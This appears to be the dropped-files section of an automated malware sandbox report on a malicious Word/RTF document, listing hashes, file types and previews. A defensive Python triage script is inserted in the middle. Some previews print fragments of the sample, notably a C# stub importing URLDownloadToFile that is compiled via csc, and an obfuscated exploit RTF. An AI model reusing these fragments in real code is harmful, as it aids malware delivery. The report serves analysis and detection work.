SHA-512:7E6519B0F9F221B257B2113363BA4BB3E8E55FD63FC129E2761F5587F02A773064E31559AE16B6AC9267BA40A25CF8DC03BE57217AA800047E6BCCD2FDE9AF93
Malicious:false
Preview:{. "geoplugin_request":"173.254.250.90",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1505804
Entropy (8bit):1.5373625757766853
Encrypted:false
SSDEEP:768:0LibOpAijJ7eb6Z777pRt/n/DCrhCO77pZBfB8n2/GlgdzfUsM:nbu+uZt/n/mMmBG2cZsM
MD5:5B10EB871FC363103C5E47EF06279006
SHA1:54BF2A907C6AD22B9C0C4A1A90E4DBD6AC1132F8
SHA-256:6B8BF5308896F989C556A5C64E8E7473B668FFDC7230422B8656BAC3A3C6B52D
SHA-512:3FD1538F75D14470757836BF41577E2BEBD284F8D525D76050750BC58137B38B4515D1DAE649089DF7B0E873CD4BE982287D1D53B30FC1C9D8707C1166295C3C
Malicious:false
Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
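Read together, the records above pair processes with artefacts they have no business producing: Equation Editor writing a file at all, CasPol.exe (a signed .NET utility) persisting a geoplugin.net reply, and PowerShell writing a UTF-16 text file whose dotted preview (.p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. ...) is ordinary VBScript once the encoding is honoured rather than a second obfuscation layer. The block below is an added example, not tooling from Joe Sandbox or from the report: it re-types four of the records above as dicts (process path, libmagic type, MD5 and verdict as printed; the file heads are constructed from the previews, since the full contents are not on the page) and runs those three checks over them, decoding UTF-16 by BOM or by the NUL-in-odd-bytes pattern before any keyword search.

```python
import json
import re
from pathlib import PureWindowsPath

# Four of the dropped-file records above. The "head" bytes are constructed from
# each record's preview; the complete files are not on the page.
RECORDS = [
    {"process": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "file_type": "Unicode text, UTF-16, little-endian text, with CRLF line terminators",
     "md5": "E9D4662595A294AA122FB25CB9596E64", "malicious": False,
     "head": b"\xff\xfe" + ("private function CreateSession(wsman, conStr, optDic, avinagrar)\r\n"
                            "    dim carnistaFlags\r\n").encode("utf-16-le")},
    {"process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "file_type": "HTML document, ASCII text, with very long lines (65520), with CRLF line terminators",
     "md5": "02B4AB021D0F800EC41B06E11B8DA4AC", "malicious": True,
     "head": b'<script>\r\n document.write(unescape("%3Cscript%20language%3DJavaScript%3E'},
    {"process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "file_type": "JSON data",
     "md5": "F2892DD2C0877EA2A51B1A178A1655FC", "malicious": False,
     "head": b'{"geoplugin_request":"173.254.250.90","geoplugin_status":200,"geoplugin_countryCode":"US"}'},
    {"process": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "file_type": "Windows Enhanced Metafile (EMF) image data version 0x10000",
     "md5": "5B10EB871FC363103C5E47EF06279006", "malicious": False,
     "head": b"\x01\x00\x00\x00l\x00\x00\x00"},
]

def decode_text(data):
    """Decode a dropped text file. A preview that reads .p.r.i.v.a.t.e. is
    UTF-16, not obfuscation, and must be decoded before any keyword search."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le", "replace")
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be", "replace")
    # BOM-less UTF-16LE: printable ASCII in the even bytes, NUL in the odd ones
    if len(data) >= 4 and 0x20 <= data[0] < 0x7F and data[1] == 0 and data[3] == 0:
        return data.decode("utf-16-le", "replace")
    return data.decode("latin-1")

# A VBScript procedure header at the start of a line
_VBS_PROC = re.compile(r"^\s*(?:private\s+|public\s+)?(?:function|sub)\s+\w+\s*\(", re.I | re.M)

def triage(rec):
    """Return the rule tags a record trips; an empty list means nothing to act on."""
    tags = []
    exe = PureWindowsPath(rec["process"]).name.lower()
    text = decode_text(rec["head"])
    if exe == "eqnedt32.exe":
        # Equation Editor has no legitimate reason to write files (the report's
        # own Sigma hit "File Dropped By EQNEDT32EXE" says the same)
        tags.append("eqnedt32_drop")
    if exe == "caspol.exe" and rec["file_type"].startswith("JSON"):
        try:
            obj = json.loads(text)
        except ValueError:
            obj = {}
        if isinstance(obj, dict) and any(k.startswith("geoplugin_") for k in obj):
            # A signed .NET utility saving a geolocation reply: consistent with
            # the report's process-injection signatures, not with CasPol's job
            tags.append("geoplugin_lookup")
    if "UTF-16" in rec["file_type"] and _VBS_PROC.search(text):
        tags.append("vbs_in_utf16")
    if rec["malicious"] and not tags:
        tags.append("unclassified_malicious")
    return tags

if __name__ == "__main__":
    for rec in RECORDS:
        print(rec["md5"], PureWindowsPath(rec["process"]).name, triage(rec))
```

The rules are deliberately keyed on the writing process rather than on the file's own look, since the EMF and JSON files are, by themselves, unremarkable. The "unclassified_malicious" tag exists so that a sandbox verdict with no matching rule is surfaced for manual review instead of silently dropped.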
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Rich Text Format data, version 1
Category:dropped
Size (bytes):87950
Entropy (8bit):2.6460884092834385
Encrypted:false
SSDEEP:768:OjO/O2+S+PXH9C+QwmXiTfgiK2l2xIPaa:gR2Dl+QtwDlca
MD5:BFC7589C5992988E346361BA16E0F921
SHA1:A546AAECD617E235E40362B626A2586636C39D65
SHA-256:A4030FDB30504AAA2077873AAD15595B4D87BBFABAEB8AE1B245D6613941A591
SHA-512:298C036894BB4FF1971DD2D9EA554872830B53D65DE0CC70770580E9276F6F1251F6A075407585268F6E292D15FDB3AB27E66CD3554E501D7A68D02E37842232
Malicious:false
Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, Author: ditekSHen
Preview:{\rtf1..{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}..{\5265154797?./.86&63.1~=3??1##&+?.@5:~_.#,3.;[9$69,?9%'#?/%.1?3<?!7!?:9-3*622~5=''8?4]8?=)4;.8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=.1|`3.]~?6#(*&?##?+_,||>@6.)7[@?3/[9.|?@(?#]^(!%3&)&%73%6`%.$^[?&?;?.*^<1[8][0[?$.|0?/4.8%3.~'./36??(8`*?.6?<@@2/-/=.%|5*|%;,]:19!$.%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~].4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0.^?-&?$+<1#//+-?,6*[(16<..`613)%>?@%?|2`6;<%&/2_#=>=@2.-8~.?+4;.-%#6%^9,^~_!?1803%'4#(.%2?!%%/*6'!]`((1;+?..``?._))0?,<53=@@9..9?-^,|&@~:^.@'|^&%|'%?`.`.-^.&?6/+)</6,]/?,.#!:8.!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_.`!'&3;..:2-$&,.'0.@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-.|`/?#.-^~^?&?;)?<0]]/8,|?*.%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)./7+?5-`.!:~'(@-~.&:>*^1?/0@+.^5'?<93[.,'(7<7<&:&&%?5>'$.'>98'$'.3'/>:&80~`%..@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#.2!?&)[+$??*0%>13?~_2`(:7~==*?,1]>5.5<3:<?./6`#<[**@>(`5<1~?#*6/#?_%.?:@%,?9?*~.0|[.%7$+32%>[~.,82))[%6/>95--$.+;<??
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1505804
Entropy (8bit):0.7675459840560199
Encrypted:false
SSDEEP:1536:JHUeftXoA9wy4X4da3H0UpyKkqxJ6jT1Fk:JHftXR9wyc4da3H0UpyNqCjT1Fk
MD5:F24D633207ADC1D6552DC4F828B8C24B
SHA1:C69130CEFC20FC6FA19803CA47D57BD784F2870F
SHA-256:7913E08C0F2237C6E9975EEBA4499AA5627107017134A60B4272D90822423F12
SHA-512:E063BDA64808A2D8490C03E685E313F6A209D28E61057EC3C93E7301054D39B3377AACE04EA5E2524964D9B20464D0483774D44E9B52630B9FBB258111D32B70
Malicious:false
Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1504016
Entropy (8bit):2.4398608801152193
Encrypted:false
SSDEEP:3072:FITPdQ/zh7PsKANiceWpWUgimSyvwpWiYiV1h5FildmAd7CUCKMi+c2q2coH4HAt:FIrimNiceWWUPByopWChylpdxoHJ2+
MD5:AC10ADEB2A9D6FC6FF6A258E76747696
SHA1:0FDD4E28A13F81DA9FFCFB571B134E1F45AD3A92
SHA-256:3431033CA736890EE16648952CDDAFF6DDF70E17D59FCBFFDF69F492B7188375
SHA-512:0534BE83D100FA6E41FD0D93B35AD4F304DBC59A5ED33D6C2A1816603536C86759F5B8BB92958EB5E21490AF558214CA21F951A1E103EE3000A0933C12435691
Malicious:false
Preview:....l...........R...H............)...;.. EMF................................8...X....................?...........................................)...;..........S...I...Q...T...........R...H...................S...I...P...(...x........... ....)...;..(...S...I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):4816896
Entropy (8bit):2.2747218255427213
Encrypted:false
SSDEEP:12288:Si4IrfNiczByopvhylpdOJC7R/gtGoXuDK6CI05YbuR011xDsi:9vZhylpdOO/gsol6C15Ybu8b
MD5:85D84D56993BB236CE8D81AECC132E30
SHA1:EA526BC8E6F6262EA0981CF7F9B47F82F7361CBA
SHA-256:86BDB5453A497219DE10DC373C36ABB85724CC380607557B864682B6ED302687
SHA-512:E1FCD1AABBC03DCF698A48C63D77B5DE22F5346A5DBCAD2E84F4446A35A67B07F89A4FFA12BDDC91399BBFC896689D4330BE11EE1BCC32EA9C93413FBFEA2B1C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview:......................>...................J...................................................................................................................................1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G.......................................................................................................M$..............................................................................................................................................................................0...............................................................................................!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):2.411772832245565
Encrypted:false
SSDEEP:12:NXHH3qpWmyayKpWmyayKpWmyaWBz/Ips+yvoOAH1IWj1ABvZSA:9na3oK3oK3yE++THuWj1UF
MD5:54ED5B3B148ED05A5A6C394E6D007E92
SHA1:DA255B0440C9DB2412E7AB00E54185EEA0650D0B
SHA-256:B3D90B13DED7D2011875C6A606387DEA09E17DB8230CC0EF174981658BB4D419
SHA-512:CA8A3DBA48F34A614828BD67B59A92D3067FBC13D9AB451DCD19A5F30D35F71F40CE8AF08EAE9574E3BB7C267616883958B41A60D49C166B1B344658C440B9FB
Malicious:false
Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....................................................................................................................................................................................................................................X...Z...\...^...b...f...j....................................................................................................................................................................................................................................................................................................................................................................................................d........gd........
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:StarOffice Gallery theme j, 1828744448 objects, 1st 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13312
                                                                                                                                                                        Entropy (8bit):3.626950772374087
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:1BlezssHyH1YthSznJeizs0KlxZAHJ4aAgKLYzK55ou2FRFqqwZIdk9jOmkAb:7YHyHSL9xXQK5+FRFqqwZIOfnb
                                                                                                                                                                        MD5:A95212FE656331CA9A95B8CCEC1EADE6
                                                                                                                                                                        SHA1:C4AC88C2D8D8BA630D084A67D66DAED4E1CCA7EE
                                                                                                                                                                        SHA-256:0E6BB1425551ABC7BD034057612C79F1B2CF8A525E6EB0B87E0C253491A3A014
                                                                                                                                                                        SHA-512:A0978C88111FAC1FD0D6B7EC0B1A7D3FB9A21C84F45A1AE72B55CEAED9ADF47D39997A026042B11EEAF4235EF892B6817AC44E27F137E4085FA36BEC15B7B954
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1024
                                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Oct 23 15:26:43 2024, 1st section name ".debug$S"
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1324
                                                                                                                                                                        Entropy (8bit):4.011201687151952
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:HRi69dUBcQhpDdHd6wKPfeI+ycuZhNmYakSZNPNnqSud:s2u9RKPm1ulmYa3ZXqSu
                                                                                                                                                                        MD5:B46C7C140CC97B9985363E258E608A6C
                                                                                                                                                                        SHA1:3C0BF962827CE222D5304C3A3099EA67B5A5B964
                                                                                                                                                                        SHA-256:D09FFF6C86421330786F4951B704E2C9135EFA8A084AF8F4B8F3CA674A29D0C5
                                                                                                                                                                        SHA-512:B90C80469F966080FB8FB4DC4470B77B6563C3C63DA7AFE6749FEF60B9898191EE21F7A1A8E6A043D83CBB0535E3232C6F35F3CBBA10747DA13FEDA814235A3F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L......g.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........T....c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP...............aa.g)....`.^J.[..........4.......C:\Users\user\AppData\Local\Temp\RES8872.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3d910114, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):21037056
                                                                                                                                                                        Entropy (8bit):1.1388600355728242
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:iO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:iOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                        MD5:D36D5C3CFB8267727D7975343965203B
                                                                                                                                                                        SHA1:93F1F523986DAFDC0ADD395270DF7113D85F0682
                                                                                                                                                                        SHA-256:01A25C3697CC2E6A5535CAE1D2BBA6C6027BD527FBB12665CCF2052DA48A6DBF
                                                                                                                                                                        SHA-512:745257EBB4E81A93778B66E4D8BD88AE263AA570C7615258BC22CB735BEF846E6AECD53FF146BE230B7A2CCA7BE940A4329FFDF1706A1A082829AFFD0D964BE0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                        Entropy (8bit):3.106951660604609
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryy5Yak7YnqqH5NPN5Dlq5J:+RI+ycuZhNmYakSZNPNnqX
                                                                                                                                                                        MD5:6161C3966729D7F697DC60BA5E4A975B
                                                                                                                                                                        SHA1:E18FE4DA827B94CC94970FFFE507FC72E29FDE71
                                                                                                                                                                        SHA-256:639B8EED54BF6A9D2DFE9F48504FB497CB550BBB764335C2D54F0E7B06A5E39C
                                                                                                                                                                        SHA-512:ADAC6F2082F87D865E6FB0D554F2C8195F8BD8D68C6BF385B99ED1524558BEE52C9142BF881FAB65F5F682AF78454E759FCB03942F998C75D92EB0002EC569F0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):473
                                                                                                                                                                        Entropy (8bit):3.8268655042395507
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:V/DsYLDS81zudnUlNFdMGHJQXReKJ8SRHy4H5brbcVO7TJy:V/DTLDfulUGXfHSwy
                                                                                                                                                                        MD5:67AE4DF6A1C261AA858A750A83C8D280
                                                                                                                                                                        SHA1:638E31EC092818F9C185A373E406F5D22D14B776
                                                                                                                                                                        SHA-256:1B3518C97744E3F5DCB626A3F6255B2327D3142CA96470BA25150360779A1ECE
                                                                                                                                                                        SHA-512:FBF8827829A806FE8C3F3F1B642631DCD4C89BA029BDC272D8E2F8040934A7D704099EF235BFD870CA2984B3146E45B0836FD19068C37A30CC6F1A308F68CCA8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace GxeSMVBq.{. public class r. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr hckcPhb,string aWJLSiO,string SPiuVk,uint MvunjagDV,IntPtr aKxSkguH);.. }..}.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):369
                                                                                                                                                                        Entropy (8bit):5.295065223597476
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fdElzxs7+AEszIP23fdEgn:p37Lvkmb6KzlIWZEolF
                                                                                                                                                                        MD5:0D9D24484E8C9B8B1AC03F37A6556912
                                                                                                                                                                        SHA1:F5F086902A7BE153A6A94A093D3F99C3D4111139
                                                                                                                                                                        SHA-256:64157CD1775F8BCA930DEE64893D63EAE7456A478F2DF1D4D6DBCFC51E329021
                                                                                                                                                                        SHA-512:4FC52811E6EBC0920269694412F2C9ACB10897F5592C1EC3255C32F959C6083C63262E16EC4BFEEACC8F8F7181B317C18FADF1E466DBE2705A3474F90293FB36
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.0.cs"
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):3072
                                                                                                                                                                        Entropy (8bit):2.844053212743285
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:6Bskr+lUtvCUUC1OfJ7VBbCZX1ulmYa3ZXq:qiGaXdNCeXK
                                                                                                                                                                        MD5:DF07BB54198A397D0F678012983B44BC
                                                                                                                                                                        SHA1:E771DD1E45E34973D82C7A9FBF5EF33A9C7F2CEB
                                                                                                                                                                        SHA-256:AFB44ABB667604D9618738EF4861C6F501CBBB5327F4262DBE2231C277AC3D10
                                                                                                                                                                        SHA-512:E903A40DE2B38CAF9B6FB15958377C0148B99155FB967EE87FAF5736507B52A9DBF409BD889054FFF25CD5969EF85A0BF178CBEF5FFB48540039945C3019DD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                         Preview:(binary PE image, non-printable bytes omitted) MZ/DOS stub "This program cannot be run in DOS mode", PE32 header, sections .text / .rsrc / .reloc, CLR metadata "BSJB" v4.0.30319 with #~, #Strings, #US, #GUID and #Blob streams, first metadata name <Module>.j0
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):864
                                                                                                                                                                        Entropy (8bit):5.371204427022579
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:Aqd3ka6KzvEoCKaMD5DqBVKVrdFAMBJTH:Aika60vEoCKdDcVKdBJj
                                                                                                                                                                        MD5:1311699947C9EF1E5793A231175094B2
                                                                                                                                                                        SHA1:FF1DC82FBB8C8C3BA93752613ED4064ABB5FC233
                                                                                                                                                                        SHA-256:A6F2447301FF4BD58D97C307C81FE6721EE42D2FC07C693F9D16B15B2F5B676A
